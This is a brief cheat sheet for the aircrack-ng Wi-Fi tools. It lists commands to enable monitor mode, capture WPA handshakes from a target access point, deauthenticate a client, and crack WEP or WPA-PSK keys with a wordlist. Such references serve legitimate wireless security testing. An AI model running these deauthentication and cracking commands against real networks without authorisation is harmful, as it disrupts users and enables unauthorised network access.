https://github.com/aircrack-ng/aircrack-ng
Monitor Mode
airmon-ng check kill
    Kill processes that interfere with monitor mode.
airmon-ng start wlan0
    Start monitor mode on the wlan0 interface.
Capture
airodump-ng wlan0mon
    Listen for nearby APs.
airodump-ng wlan0mon -w scan
    Identify the target BSSID and channel.
airodump-ng wlan0mon -w capture --bssid AP:MAC --channel 6
    Capture traffic from an AP. Wait for the WPA handshake to show in the top right. A Deauth Attack can be used to speed up the process.
Deauth Attack
aireplay-ng wlan0mon -0 1 -a AP:MAC -c CLIENT:MAC
    Deauth attack (kick the client off the AP really quick).
-0 1
    Deauth, one time.
-c
    Client to deauthenticate.
Crack WEP, WPA-PSK
aircrack-ng -a WEP myCapture.cap
aircrack-ng -w wordlist.txt -b AP:MAC myCaptureFromAirodump
-a WEP
    Attack mode: WEP (needs > 5000 IVs) or WPA-PSK.
-e mySSID
    Specifies the SSID.
-n 64
    Size of the key (64, 128, 152, 256, 512).